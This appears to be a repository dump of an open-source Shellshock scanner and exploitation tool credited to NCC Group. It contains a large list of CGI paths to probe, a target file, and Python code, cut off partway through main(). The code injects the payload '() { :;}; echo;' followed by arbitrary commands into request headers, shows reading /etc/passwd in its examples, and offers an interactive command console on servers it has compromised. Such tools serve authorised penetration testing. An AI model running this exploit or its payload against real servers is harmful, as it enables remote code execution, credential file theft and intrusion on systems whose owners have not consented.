7 | # http://khalil-shreateh.com/khalil.shtml/index.php/websites/websites-security/201-ais-shellshock-scanning-tool-that-leverages-the-user-agent-header-against-a-large-list-of-possible-targets-written-in-c.html?showall=1
8 | # http://www.linuxfeed.org/2014/10/advanced-information-security-shellshock-scanner/
9 | # https://github.com/francisck/shellshock-cgi/blob/master/shellshock_cgi.py
10 | # http://shellshock.detectify.com
11 | /
12 | /admin.cgi
13 | /administrator.cgi
14 | /agora.cgi
15 | /aktivate/cgi-bin/catgy.cgi
16 | /analyse.cgi
17 | /apps/web/vs_diag.cgi
18 | /axis-cgi/buffer/command.cgi
19 | /b2-include/b2edit.showposts.php
20 | /bandwidth/index.cgi
21 | /bigconf.cgi
22 | /cartcart.cgi
23 | /cart.cgi
24 | /ccbill/whereami.cgi
25 | /cgi-bin/14all-1.1.cgi
26 | /cgi-bin/14all.cgi
27 | /cgi-bin/a1disp3.cgi
28 | /cgi-bin/a1stats/a1disp3.cgi
29 | /cgi-bin/a1stats/a1disp4.cgi
30 | /cgi-bin/addbanner.cgi
31 | /cgi-bin/add_ftp.cgi
32 | /cgi-bin/adduser.cgi
33 | /cgi-bin/admin/admin.cgi
34 | /cgi-bin/admin.cgi
35 | /cgi-bin/admin/getparam.cgi
36 | /cgi-bin/adminhot.cgi
37 | /cgi-bin/admin.pl
38 | /cgi-bin/admin/setup.cgi
39 | /cgi-bin/adminwww.cgi
40 | /cgi-bin/af.cgi
41 | /cgi-bin/aglimpse.cgi
42 | /cgi-bin/alienform.cgi
43 | /cgi-bin/AnyBoard.cgi
44 | /cgi-bin/architext_query.cgi
45 | /cgi-bin/astrocam.cgi
46 | /cgi-bin/AT-admin.cgi
47 | /cgi-bin/AT-generate.cgi
48 | /cgi-bin/auction/auction.cgi
49 | /cgi-bin/auktion.cgi
50 | /cgi-bin/ax-admin.cgi
51 | /cgi-bin/ax.cgi
52 | /cgi-bin/axs.cgi
53 | /cgi-bin/badmin.cgi
54 | /cgi-bin/banner.cgi
55 | /cgi-bin/bannereditor.cgi
56 | /cgi-bin/bb-ack.sh
57 | /cgi-bin/bb-histlog.sh
58 | /cgi-bin/bb-hist.sh
59 | /cgi-bin/bb-hostsvc.sh
60 | /cgi-bin/bb-replog.sh
61 | /cgi-bin/bb-rep.sh
62 | /cgi-bin/bbs_forum.cgi
63 | /cgi-bin/bigconf.cgi
64 | /cgi-bin/bizdb1-search.cgi
65 | /cgi-bin/blog/mt-check.cgi
66 | /cgi-bin/blog/mt-load.cgi
67 | /cgi-bin/bnbform.cgi
68 | /cgi-bin/book.cgi
69 | /cgi-bin/boozt/admin/index.cgi
70 | /cgi-bin/bsguest.cgi
71 | /cgi-bin/bslist.cgi
72 | /cgi-bin/build.cgi
73 | /cgi-bin/bulk/bulk.cgi
74 | /cgi-bin/cached_feed.cgi
75 | /cgi-bin/cachemgr.cgi
76 | /cgi-bin/calendar/index.cgi
77 | /cgi-bin/cartmanager.cgi
78 | /cgi-bin/cbmc/forums.cgi
79 | /cgi-bin/ccvsblame.cgi
80 | /cgi-bin/c_download.cgi
81 | /cgi-bin/cgforum.cgi
82 | /cgi-bin/.cgi
83 | /cgi-bin/cgi_process
84 | /cgi-bin/classified.cgi
85 | /cgi-bin/classifieds.cgi
86 | /cgi-bin/classifieds/classifieds.cgi
87 | /cgi-bin/classifieds/index.cgi
88 | /cgi-bin/.cobalt/alert/service.cgi
89 | /cgi-bin/.cobalt/message/message.cgi
90 | /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
91 | /cgi-bin/commandit.cgi
92 | /cgi-bin/commerce.cgi
93 | /cgi-bin/common/listrec.pl
94 | /cgi-bin/compatible.cgi
95 | /cgi-bin/Count.cgi
96 | /cgi-bin/csChatRBox.cgi
97 | /cgi-bin/csGuestBook.cgi
98 | /cgi-bin/csLiveSupport.cgi
99 | /cgi-bin/CSMailto.cgi
100 | /cgi-bin/CSMailto/CSMailto.cgi
101 | /cgi-bin/csNews.cgi
102 | /cgi-bin/csNewsPro.cgi
103 | /cgi-bin/csPassword.cgi
104 | /cgi-bin/csPassword/csPassword.cgi
105 | /cgi-bin/csSearch.cgi
106 | /cgi-bin/csv_db.cgi
107 | /cgi-bin/cvsblame.cgi
108 | /cgi-bin/cvslog.cgi
109 | /cgi-bin/cvsquery.cgi
110 | /cgi-bin/cvsqueryform.cgi
111 | /cgi-bin/day5datacopier.cgi
112 | /cgi-bin/day5datanotifier.cgi
113 | /cgi-bin/db_manager.cgi
114 | /cgi-bin/dbman/db.cgi
115 | /cgi-bin/dcforum.cgi
116 | /cgi-bin/dcshop.cgi
117 | /cgi-bin/dfire.cgi
118 | /cgi-bin/diagnose.cgi
119 | /cgi-bin/dig.cgi
120 | /cgi-bin/directorypro.cgi
121 | /cgi-bin/download.cgi
122 | /cgi-bin/e87_Ba79yo87.cgi
123 | /cgi-bin/emu/html/emumail.cgi
124 | /cgi-bin/emumail.cgi
125 | /cgi-bin/emumail/emumail.cgi
126 | /cgi-bin/enter.cgi
127 | /cgi-bin/environ.cgi
128 | /cgi-bin/ezadmin.cgi
129 | /cgi-bin/ezboard.cgi
130 | /cgi-bin/ezman.cgi
131 | /cgi-bin/ezshopper2/loadpage.cgi
132 | /cgi-bin/ezshopper3/loadpage.cgi
133 | /cgi-bin/ezshopper/loadpage.cgi
134 | /cgi-bin/ezshopper/search.cgi
135 | /cgi-bin/faqmanager.cgi
136 | /cgi-bin/FileSeek2.cgi
137 | /cgi-bin/FileSeek.cgi
138 | /cgi-bin/finger.cgi
139 | /cgi-bin/flexform.cgi
140 | /cgi-bin/fom.cgi
141 | /cgi-bin/fom/fom.cgi
142 | /cgi-bin/FormHandler.cgi
143 | /cgi-bin/FormMail.cgi
144 | /cgi-bin/gbadmin.cgi
145 | /cgi-bin/gbook/gbook.cgi
146 | /cgi-bin/generate.cgi
147 | /cgi-bin/getdoc.cgi
148 | /cgi-bin/gH.cgi
149 | /cgi-bin/gm-authors.cgi
150 | /cgi-bin/gm.cgi
151 | /cgi-bin/gm-cplog.cgi
152 | /cgi-bin/guestbook.cgi
153 | /cgi-bin/handler
154 | /cgi-bin/handler.cgi
155 | /cgi-bin/handler/netsonar
156 | /cgi-bin/hitview.cgi
157 | /cgi-bin/hsx.cgi
158 | /cgi-bin/html2chtml.cgi
159 | /cgi-bin/html2wml.cgi
160 | /cgi-bin/htsearch.cgi
161 | /cgi-bin/icat
162 | /cgi-bin/if/admin/nph-build.cgi
163 | /cgi-bin/ikonboard/help.cgi
164 | /cgi-bin/ImageFolio/admin/admin.cgi
165 | /cgi-bin/imageFolio.cgi
166 | /cgi-bin/index.cgi
167 | /cgi-bin/infosrch.cgi
168 | /cgi-bin/jammail.pl
169 | /cgi-bin/journal.cgi
170 | /cgi-bin/lastlines.cgi
171 | /cgi-bin/loadpage.cgi
172 | /cgi-bin/login.cgi
173 | /cgi-bin/logit.cgi
174 | /cgi-bin/log-reader.cgi
175 | /cgi-bin/lookwho.cgi
176 | /cgi-bin/lwgate.cgi
177 | /cgi-bin/MachineInfo
178 | /cgi-bin/MachineInfo
179 | /cgi-bin/magiccard.cgi
180 | /cgi-bin/mail/emumail.cgi
181 | /cgi-bin/maillist.cgi
182 | /cgi-bin/mailnews.cgi
183 | /cgi-bin/mail/nph-mr.cgi
184 | /cgi-bin/main.cgi
185 | /cgi-bin/main_menu.pl
186 | /cgi-bin/man.sh
187 | /cgi-bin/mini_logger.cgi
188 | /cgi-bin/mmstdod.cgi
189 | /cgi-bin/moin.cgi
190 | /cgi-bin/mojo/mojo.cgi
191 | /cgi-bin/mrtg.cgi
192 | /cgi-bin/mt.cgi
193 | /cgi-bin/mt/mt.cgi
194 | /cgi-bin/mt/mt-check.cgi
195 | /cgi-bin/mt/mt-load.cgi
196 | /cgi-bin/mt-static/mt-check.cgi
197 | /cgi-bin/mt-static/mt-load.cgi
198 | /cgi-bin/musicqueue.cgi
199 | /cgi-bin/myguestbook.cgi
200 | /cgi-bin/.namazu.cgi
201 | /cgi-bin/nbmember.cgi
202 | /cgi-bin/netauth.cgi
203 | /cgi-bin/netpad.cgi
204 | /cgi-bin/newsdesk.cgi
205 | /cgi-bin/nlog-smb.cgi
206 | /cgi-bin/nph-emumail.cgi
207 | /cgi-bin/nph-exploitscanget.cgi
208 | /cgi-bin/nph-publish.cgi
209 | /cgi-bin/nph-test.cgi
210 | /cgi-bin/pagelog.cgi
211 | /cgi-bin/pbcgi.cgi
212 | /cgi-bin/perlshop.cgi
213 | /cgi-bin/pfdispaly.cgi
214 | /cgi-bin/pfdisplay.cgi
215 | /cgi-bin/phf.cgi
216 | /cgi-bin/photo/manage.cgi
217 | /cgi-bin/photo/protected/manage.cgi
218 | /cgi-bin/php-cgi
219 | /cgi-bin/php.cgi
220 | /cgi-bin/php.fcgi
221 | /cgi-bin/ping.sh
222 | /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
223 | /cgi-bin/pollssi.cgi
224 | /cgi-bin/postcards.cgi
225 | /cgi-bin/powerup/r.cgi
226 | /cgi-bin/printenv
227 | /cgi-bin/probecontrol.cgi
228 | /cgi-bin/profile.cgi
229 | /cgi-bin/publisher/search.cgi
230 | /cgi-bin/quickstore.cgi
231 | /cgi-bin/quizme.cgi
232 | /cgi-bin/ratlog.cgi
233 | /cgi-bin/r.cgi
234 | /cgi-bin/register.cgi
235 | /cgi-bin/replicator/webpage.cgi/
236 | /cgi-bin/responder.cgi
237 | /cgi-bin/robadmin.cgi
238 | /cgi-bin/robpoll.cgi
239 | /cgi-bin/rtpd.cgi
240 | /cgi-bin/sbcgi/sitebuilder.cgi
241 | /cgi-bin/scoadminreg.cgi
242 | /cgi-bin-sdb/printenv
243 | /cgi-bin/sdbsearch.cgi
244 | /cgi-bin/search
245 | /cgi-bin/search.cgi
246 | /cgi-bin/search/search.cgi
247 | /cgi-bin/sendform.cgi
248 | /cgi-bin/shop.cgi
249 | /cgi-bin/shopper.cgi
250 | /cgi-bin/shopplus.cgi
251 | /cgi-bin/showcheckins.cgi
252 | /cgi-bin/simplestguest.cgi
253 | /cgi-bin/simplestmail.cgi
254 | /cgi-bin/smartsearch.cgi
255 | /cgi-bin/smartsearch/smartsearch.cgi
256 | /cgi-bin/snorkerz.bat
257 | /cgi-bin/snorkerz.bat
258 | /cgi-bin/snorkerz.cmd
259 | /cgi-bin/snorkerz.cmd
260 | /cgi-bin/sojourn.cgi
261 | /cgi-bin/spin_client.cgi
262 | /cgi-bin/start.cgi
263 | /cgi-bin/status
264 | /cgi-bin/status_cgi
265 | /cgi-bin/store/agora.cgi
266 | /cgi-bin/store.cgi
267 | /cgi-bin/store/index.cgi
268 | /cgi-bin/survey.cgi
269 | /cgi-bin/sync.cgi
270 | /cgi-bin/talkback.cgi
271 | /cgi-bin/technote/main.cgi
272 | /cgi-bin/test2.pl
273 | /cgi-bin/test-cgi
274 | /cgi-bin/test.cgi
275 | /cgi-bin/testing_whatever
276 | /cgi-bin/test/test.cgi
277 | /cgi-bin/tidfinder.cgi
278 | /cgi-bin/tigvote.cgi
279 | /cgi-bin/title.cgi
280 | /cgi-bin/top.cgi
281 | /cgi-bin/traffic.cgi
282 | /cgi-bin/troops.cgi
283 | /cgi-bin/ttawebtop.cgi/
284 | /cgi-bin/ultraboard.cgi
285 | /cgi-bin/upload.cgi
286 | /cgi-bin/urlcount.cgi
287 | /cgi-bin/viewcvs.cgi
288 | /cgi-bin/view_help.cgi
289 | /cgi-bin/viralator.cgi
290 | /cgi-bin/virgil.cgi
291 | /cgi-bin/vote.cgi
292 | /cgi-bin/vpasswd.cgi
293 | /cgi-bin/way-board.cgi
294 | /cgi-bin/way-board/way-board.cgi
295 | /cgi-bin/webbbs.cgi
296 | /cgi-bin/webcart/webcart.cgi
297 | /cgi-bin/webdist.cgi
298 | /cgi-bin/webif.cgi
299 | /cgi-bin/webmail/html/emumail.cgi
300 | /cgi-bin/webmap.cgi
301 | /cgi-bin/webspirs.cgi
302 | /cgi-bin/Web_Store/web_store.cgi
303 | /cgi-bin/whois.cgi
304 | /cgi-bin/whois_raw.cgi
305 | /cgi-bin/whois/whois.cgi
306 | /cgi-bin/wrap
307 | /cgi-bin/wrap.cgi
308 | /cgi-bin/wwwboard.cgi.cgi
309 | /cgi-bin/YaBB/YaBB.cgi
310 | /cgi-bin/zml.cgi
311 | /cgi-mod/index.cgi
312 | /cgis/wwwboard/wwwboard.cgi
313 | /cgi-sys/addalink.cgi
314 | /cgi-sys/defaultwebpage.cgi
315 | /cgi-sys/domainredirect.cgi
316 | /cgi-sys/entropybanner.cgi
317 | /cgi-sys/entropysearch.cgi
318 | /cgi-sys/FormMail-clone.cgi
319 | /cgi-sys/helpdesk.cgi
320 | /cgi-sys/mchat.cgi
321 | /cgi-sys/randhtml.cgi
322 | /cgi-sys/realhelpdesk.cgi
323 | /cgi-sys/realsignup.cgi
324 | /cgi-sys/signup.cgi
325 | /connector.cgi
326 | /cp/rac/nsManager.cgi
327 | /create_release.sh
328 | /CSNews.cgi
329 | /csPassword.cgi
330 | /dcadmin.cgi
331 | /dcboard.cgi
332 | /dcforum.cgi
333 | /dcforum/dcforum.cgi
334 | /debuff.cgi
335 | /debug.cgi
336 | /details.cgi
337 | /edittag/edittag.cgi
338 | /emumail.cgi
339 | /enter_buff.cgi
340 | /enter_bug.cgi
341 | /ez2000/ezadmin.cgi
342 | /ez2000/ezboard.cgi
343 | /ez2000/ezman.cgi
344 | /fcgi-bin/echo
345 | /fcgi-bin/echo
346 | /fcgi-bin/echo2
347 | /fcgi-bin/echo2
348 | /Gozila.cgi
349 | /hitmatic/analyse.cgi
350 | /hp_docs/cgi-bin/index.cgi
351 | /html/cgi-bin/cgicso
352 | /html/cgi-bin/cgicso
353 | /index.cgi
354 | /info.cgi
355 | /infosrch.cgi
356 | /login.cgi
357 | /mailview.cgi
358 | /main.cgi
359 | /megabook/admin.cgi
360 | /ministats/admin.cgi
361 | /mods/apage/apage.cgi
362 | /_mt/mt.cgi
363 | /musicqueue.cgi
364 | /ncbook.cgi
365 | /newpro.cgi
366 | /newsletter.sh
367 | /oem_webstage/cgi-bin/oemapp_cgi
368 | /page.cgi
369 | /parse_xml.cgi
370 | /photodata/manage.cgi
371 | /photo/manage.cgi
372 | /print.cgi
373 | /process_buff.cgi
374 | /process_bug.cgi
375 | /pub/english.cgi
376 | /quikmail/nph-emumail.cgi
377 | /quikstore.cgi
378 | /reviews/newpro.cgi
379 | /ROADS/cgi-bin/search.pl
380 | /sample01.cgi
381 | /sample02.cgi
382 | /sample03.cgi
383 | /sample04.cgi
384 | /sampleposteddata.cgi
385 | /scancfg.cgi
386 | /scancfg.cgi
387 | /servers/link.cgi
388 | /setpasswd.cgi
389 | /SetSecurity.shm
390 | /shop/member_html.cgi
391 | /shop/normal_html.cgi
392 | /site_searcher.cgi
393 | /siteUserMod.cgi
394 | /submit.cgi
395 | /technote/print.cgi
396 | /template.cgi
397 | /test.cgi
398 | /ucsm/isSamInstalled.cgi
399 | /upload.cgi
400 | /userreg.cgi
401 | /users/scripts/submit.cgi
402 | /vood/cgi-bin/vood_view.cgi
403 | /Web_Store/web_store.cgi
404 | /webtools/bonsai/ccvsblame.cgi
405 | /webtools/bonsai/cvsblame.cgi
406 | /webtools/bonsai/cvslog.cgi
407 | /webtools/bonsai/cvsquery.cgi
408 | /webtools/bonsai/cvsqueryform.cgi
409 | /webtools/bonsai/showcheckins.cgi
410 | /wwwadmin.cgi
411 | /wwwboard.cgi
412 | /wwwboard/wwwboard.cgi
413 |
--------------------------------------------------------------------------------
/shocker-target_list:
--------------------------------------------------------------------------------
1 | # Enter IPs one per line, no commas or anything else other than digits and dots
2 | # For example:
3 | # 192.168.1.1
4 | # www.example.com
5 | 127.0.0.1
6 | localhost
7 |
--------------------------------------------------------------------------------
/shocker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | shocker.py v1.1
5 | A tool to find and exploit webservers vulnerable to Shellshock
6 |
7 | ##############################################################################
8 | # Released as open source by NCC Group Plc - http://www.nccgroup.com/ #
9 | # #
10 | # Developed by Tom Watson, tom.watson@nccgroup.trust #
11 | # #
12 | # https://www.github.com/nccgroup/shocker #
13 | # #
14 | # Released under the GNU Affero General Public License #
15 | # (https://www.gnu.org/licenses/agpl-3.0.html) #
16 | ##############################################################################
17 |
18 | Usage examples:
19 | ./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
20 | Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat
21 | /etc/passwd
22 |
23 | ./shocker.py -H www.example.com -p 8001 -s
24 | Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and
25 | attempts the default exploit for any found
26 |
27 | ./shocker.py -f iplist
28 | Scans all hosts specified in the file ./iplist with default options
29 |
30 | Read the README for more details
31 | """
32 |
33 | import urllib2
34 | import argparse
35 | import string
36 | import StringIO
37 | import random
38 | import signal
39 | import sys
40 | import socket
41 | import Queue
42 | import threading
43 | import re
44 | from collections import OrderedDict
45 |
46 |
47 | # Wrapper object for sys.sdout to elimate buffering
48 | # (https://stackoverflow.com/questions/107705/python-output-buffering)
49 | class Unbuffered(object):
50 | def __init__(self, stream):
51 | self.stream = stream
52 | def write(self, data):
53 | self.stream.write(data)
54 | self.stream.flush()
55 | def __getattr__(self, attr):
56 | return getattr(self.stream, attr)
57 |
58 | # Wrap std.out in Unbuffered
59 | sys.stdout = Unbuffered(sys.stdout)
60 |
61 |
62 | # User-agent to use instead of 'Python-urllib/2.6' or similar
63 | user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
64 |
65 | # Handle CTRL-c elegently
66 | def signal_handler(signal, frame):
67 | """ Try to catch and respond to CTRL-Cs
68 | """
69 |
70 | sys.exit(0)
71 |
72 | # Timeout for urllib2.urlopen requests
73 | TIMEOUT = 5
74 |
75 | def check_hosts(host_target_list, port, verbose):
76 | """ Do some basic sanity checking on hosts to make sure they resolve
77 | and are currently reachable on the specified port(s)
78 | """
79 |
80 | counter = 0
81 | number_of_targets = len (host_target_list)
82 | confirmed_hosts = [] # List of resoveable and reachable hosts
83 | if number_of_targets > 1:
84 | print "[+] Checking connectivity to targets..."
85 | else:
86 | print "[+] Checking connectivity with target..."
87 | for host in host_target_list:
88 | counter += 1
89 | # Show a progress bar unless verbose or there is only 1 host
90 | if not verbose and number_of_targets > 1:
91 | print_progress(number_of_targets, counter)
92 |
93 | try:
94 | if verbose: print "[I] Checking to see if %s resolves..." % host
95 | ipaddr = socket.gethostbyname(host)
96 | if verbose: print "[I] Resolved ok"
97 | if verbose: print "[I] Checking to see if %s is reachable on port %s..." % (host, port)
98 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
99 | s.settimeout(5.0)
100 | s.connect((ipaddr, int(port)))
101 | s.close()
102 | if verbose: print "[I] %s seems reachable..." % host
103 | confirmed_hosts.append(host)
104 | except Exception as e:
105 | print "[!] Exception - %s: %s" % (host, e)
106 | print "[!] Omitting %s from target list..." % host
107 | if len(host_target_list) > 1:
108 | print "[+] %i of %i targets were reachable" % \
109 | (len(confirmed_hosts), number_of_targets)
110 | elif len(confirmed_hosts) == 1:
111 | print "[+] Target was reachable"
112 | else:
113 | print "[+] Host unreachable"
114 | return confirmed_hosts
115 |
116 |
117 | def scan_hosts(protocol, host_target_list, port, cgi_list, proxy, verbose):
118 | """ Go through each potential cgi in cgi_list spinning up a thread for each
119 | check. Create Request objects for each check.
120 | """
121 |
122 | # List of potentially epxloitable URLs
123 | exploit_targets = []
124 | cgi_num = len(cgi_list)
125 | q = Queue.Queue()
126 | threads = []
127 |
128 | for host in host_target_list:
129 | print "[+] Looking for vulnerabilities on %s:%s" % (host, port)
130 | cgi_index = 0
131 | for cgi in cgi_list:
132 | cgi_index += 1
133 |
134 | # Show a progress bar unless verbose or there is only 1 cgi
135 | if not verbose and cgi_num > 1: print_progress(cgi_num, cgi_index)
136 |
137 | try:
138 | req = urllib2.Request(protocol + "://" + host + ":" + port + cgi)
139 | url = req.get_full_url()
140 | if proxy:
141 | req.set_proxy(proxy, "http")
142 |
143 | # Pretend not to be Python for no particular reason
144 | req.add_header("User-Agent", user_agent)
145 |
146 | # Set the host header correctly (Python includes :port)
147 | req.add_header("Host", host)
148 |
149 | thread_pool.acquire()
150 |
151 | # Start a thread for each CGI in cgi_list
152 | if verbose: print "[I] Starting thread %i" % cgi_index
153 | t = threading.Thread(target = do_check_cgi, args = (req, q, verbose))
154 | t.start()
155 | threads.append(t)
156 | except Exception as e:
157 | if verbose: print "[I] %s - %s" % (url, e)
158 | finally:
159 | pass
160 |
161 | # Wait for all the threads to finish before moving on
162 | for thread in threads:
163 | thread.join()
164 |
165 | # Pop any results from the Queue and add them to the list of potentially
166 | # exploitable urls (exploit_targets) before returning that list
167 | while not q.empty():
168 | exploit_targets.append(q.get())
169 |
170 | if verbose: print "[+] Finished host scan"
171 | return exploit_targets
172 |
173 | def do_check_cgi(req, q, verbose):
174 | """ Worker thread for scan_hosts to check if url is reachable
175 | """
176 |
177 | try:
178 | if urllib2.urlopen(req, None, TIMEOUT).getcode() == 200:
179 | q.put(req.get_full_url())
180 | except Exception as e:
181 | if verbose: print "[I] %s for %s" % (e, req.get_full_url())
182 | finally:
183 | thread_pool.release()
184 |
185 | def do_exploit_cgi(proxy, target_list, command, verbose):
186 | """ For urls identified as potentially exploitable attempt to exploit
187 | """
188 |
189 | # Flag used to identify whether the exploit has successfully caused the
190 | # server to return a useful response
191 | success_flag = ''.join(
192 | random.choice(string.ascii_uppercase + string.digits
193 | ) for _ in range(20))
194 |
195 | # Dictionary {header:attack string} to try on discovered CGI scripts
196 | # Where attack string comprises exploit + success_flag + command
197 | attacks = {
198 | "Content-type": "() { :;}; echo; "
199 | }
200 |
201 | # A dictionary of apparently successfully exploited targets
202 | # {url: (header, exploit)}
203 | # Returned to main()
204 | successful_targets = OrderedDict()
205 |
206 | if len(target_list) > 1:
207 | print "[+] %i potential targets found, attempting exploits" % len(target_list)
208 | else:
209 | print "[+] 1 potential target found, attempting exploits"
210 | for target in target_list:
211 | if verbose: print "[+] Trying exploit for %s" % target
212 | if verbose: print "[I] Flag set to: %s" % success_flag
213 | for header, exploit in attacks.iteritems():
214 | attack = exploit + " echo " + success_flag + "; " + command
215 | result = do_attack(proxy, target, header, attack, verbose)
216 | if success_flag in result:
217 | if verbose:
218 | print "[!] %s looks vulnerable" % target
219 | print "[!] Response returned was:"
220 | buf = StringIO.StringIO(result)
221 | if len(result) > (len(success_flag)):
222 | for line in buf:
223 | if line.strip() != success_flag:
224 | print " %s" % line.strip()
225 | else:
226 | print "[!] A result was returned but was empty..."
227 | print "[!] Maybe try a different exploit command?"
228 | buf.close()
229 | successful_targets.update({target: (header, exploit)})
230 | else:
231 | if verbose: print "[-] Not vulnerable"
232 | return successful_targets
233 |
234 |
235 | def do_attack(proxy, target, header, attack, verbose):
236 | result = ""
237 | host = target.split(":")[1][2:] # substring host from target URL
238 |
239 | try:
240 | if verbose:
241 | print "[I] Header is: %s" % header
242 | print "[I] Attack string is: %s" % attack
243 | req = urllib2.Request(target)
244 | req.add_header(header, attack)
245 | if proxy:
246 | req.set_proxy(proxy, "http")
247 | if verbose: print "[I] Proxy set to: %s" % str(proxy)
248 | req.add_header("User-Agent", user_agent)
249 | req.add_header("Host", host)
250 | resp = urllib2.urlopen(req, None, TIMEOUT)
251 | result = resp.read()
252 | except Exception as e:
253 | if verbose: print "[I] %s - %s" % (target, e)
254 | finally:
255 | pass
256 | return result
257 |
258 | def ask_for_console(proxy, successful_targets, verbose):
259 | """ With any discovered vulnerable servers asks user if they
260 | would like to choose one of these to send further commands to
261 | in a semi interactive way
262 | successful_targets is a dictionary:
263 | {url: (header, exploit)}
264 | """
265 |
266 | # Initialise to non zero to enter while loop
267 | user_input = 1
268 | ordered_url_list = successful_targets.keys()
269 |
270 | while user_input is not 0:
271 | result = ""
272 | print "[+] The following URLs appear to be exploitable:"
273 | for x in range(len(ordered_url_list)):
274 | print " [%i] %s" % (x+1, ordered_url_list[x])
275 | print "[+] Would you like to exploit further?"
276 | user_input = raw_input("[>] Enter an URL number or 0 to exit: ")
277 | sys.stdout.flush()
278 | try:
279 | user_input = int(user_input)
280 | except:
281 | continue
282 | if user_input not in range(len(successful_targets)+1):
283 | print "[-] Please enter a number between 1 and %i (0 to exit)" % \
284 | len(successful_targets)
285 | continue
286 | elif not user_input:
287 | continue
288 | target = ordered_url_list[user_input-1]
289 | header = successful_targets[target][0]
290 | print "[+] Entering interactive mode for %s" % target
291 | print "[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'"
292 |
293 | while True:
294 | command = ""
295 | result = ""
296 | sys.stdout.flush()
297 | command = raw_input(" > ")
298 | sys.stdout.flush()
299 | if command == "quit":
300 | sys.stdout.flush()
301 | print "[+] Exiting interactive mode..."
302 | sys.stdout.flush()
303 | break
304 | if command:
305 | attack = successful_targets[target][1] + command
306 | result = do_attack(proxy, target, header, attack, verbose)
307 | else:
308 | result = ""
309 | if result:
310 | buf = StringIO.StringIO(result)
311 | for line in buf:
312 | sys.stdout.flush()
313 | print " < %s" % line.strip()
314 | sys.stdout.flush()
315 | else:
316 | sys.stdout.flush()
317 | print " > No response"
318 | sys.stdout.flush()
319 |
320 |
321 | def validate_address(hostaddress, debug):
322 | """ Attempt to identify if proposed host address is invalid by matching
323 | against some very rough regexes """
324 |
325 | singleIP_pattern = re.compile('^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$')
326 | FQDN_pattern = re.compile('^(\w+\.)*\w+$')
327 | if debug: print "[D] Evaluating host '%s'" % hostaddress
328 | if singleIP_pattern.match(hostaddress) or FQDN_pattern.match(hostaddress):
329 | return True
330 | else:
331 | print "Host %s appears invalid, exiting..." % hostaddress
332 | exit(0)
333 |
334 |
335 | def get_targets_from_file(file_name, debug):
336 | """ Import targets to scan from file
337 | """
338 |
339 | host_target_list = []
340 | with open(file_name, 'r') as f:
341 | for line in f:
342 | line = line.strip()
343 | if not line.startswith('#') and validate_address(line, debug):
344 | host_target_list.append(line)
345 | print "[+] %i hosts imported from %s" % (len(host_target_list), file_name)
346 | return host_target_list
347 |
348 |
349 | def import_cgi_list_from_file(file_name):
350 | """ Import CGIs to scan from file
351 | """
352 |
353 | cgi_list = []
354 | with open(file_name, 'r') as f:
355 | for line in f:
356 | if not line.startswith('#'):
357 | cgi_list.append(line.strip())
358 | print "[+] %i potential targets imported from %s" % (len(cgi_list), file_name)
359 | return cgi_list
360 |
361 |
362 | def print_progress(
363 | total,
364 | count,
365 | lbracket = "[",
366 | rbracket = "]",
367 | completed = ">",
368 | incomplete = "-",
369 | bar_size = 50
370 | ):
371 | percentage_progress = (100.0/float(total))*float(count)
372 | bar = int(bar_size * percentage_progress/100)
373 | print lbracket + completed*bar + incomplete*(bar_size-bar) + rbracket + \
374 | " (" + str(count).rjust(len(str(total)), " ") + "/" + str(total) + ")\r",
375 | if percentage_progress == 100: print "\n"
376 |
377 |
378 | def main():
379 | print """
380 | .-. . .
381 | ( )| |
382 | `-. |--. .-. .-.|.-. .-. .--.
383 | ( )| |( )( |-.'(.-' |
384 | `-' ' `-`-' `-'' `-`--'' v1.1
385 |
386 | Tom Watson, tom.watson@nccgroup.trust
387 | https://www.github.com/nccgroup/shocker
388 |
389 | Released under the GNU Affero General Public License
390 | (https://www.gnu.org/licenses/agpl-3.0.html)
391 |
392 | """
393 |
394 | # Handle CTRL-c elegently
395 | signal.signal(signal.SIGINT, signal_handler)
396 |
397 | # Handle command line argumemts
398 | parser = argparse.ArgumentParser(
399 | description='A Shellshock scanner and exploitation tool',
400 | epilog='Examples of use can be found in the README'
401 | )
402 | targets = parser.add_mutually_exclusive_group(required=True)
403 | targets.add_argument(
404 | '--Host',
405 | '-H',
406 | type = str,
407 | help = 'A target hostname or IP address'
408 | )
409 | targets.add_argument(
410 | '--file',
411 | '-f',
412 | type = str,
413 | help = 'File containing a list of targets'
414 | )
415 | cgis = parser.add_mutually_exclusive_group()
416 | cgis.add_argument(
417 | '--cgilist',
418 | type = str,
419 | default = './shocker-cgi_list',
420 | help = 'File containing a list of CGIs to try'
421 | )
422 | cgis.add_argument(
423 | '--cgi',
424 | '-c',
425 | type = str,
426 | help = "Single CGI to check (e.g. /cgi-bin/test.cgi)"
427 | )
428 | parser.add_argument(
429 | '--port',
430 | '-p',
431 | default = 80,
432 | type = int,
433 | help = 'The target port number (default=80)'
434 | )
435 | parser.add_argument(
436 | '--command',
437 | default = "/bin/uname -a",
438 | help = "Command to execute (default=/bin/uname -a)"
439 | )
440 | parser.add_argument(
441 | '--proxy',
442 | help = "*A BIT BROKEN RIGHT NOW* Proxy to be used in the form 'ip:port'"
443 | )
444 | parser.add_argument(
445 | '--ssl',
446 | '-s',
447 | action = "store_true",
448 | default = False,
449 | help = "Use SSL (default=False)"
450 | )
451 | parser.add_argument(
452 | '--threads',
453 | '-t',
454 | type = int,
455 | default = 10,
456 | help = "Maximum number of threads (default=10, max=100)"
457 | )
458 | parser.add_argument(
459 | '--verbose',
460 | '-v',
461 | action = "store_true",
462 | default = False,
463 | help = "Be verbose in output"
464 | )
465 | parser.add_argument(
466 | '--debug',
467 | '-d',
468 | action = "store_true",
469 | default = False,
470 | help = "Output debugging information during execution"
471 | )
472 | args = parser.parse_args()
473 |
474 | # Assign options to variables
475 | debug = args.debug
476 | if args.Host:
477 | host_target_list = [args.Host]
478 | else:
479 | host_target_list = get_targets_from_file(args.file, debug)
480 | if not len(host_target_list) > 0:
481 | print "[-] No valid targets provided, exiting..."
482 | exit (0)
483 | port = str(args.port)
484 | if args.proxy is not None:
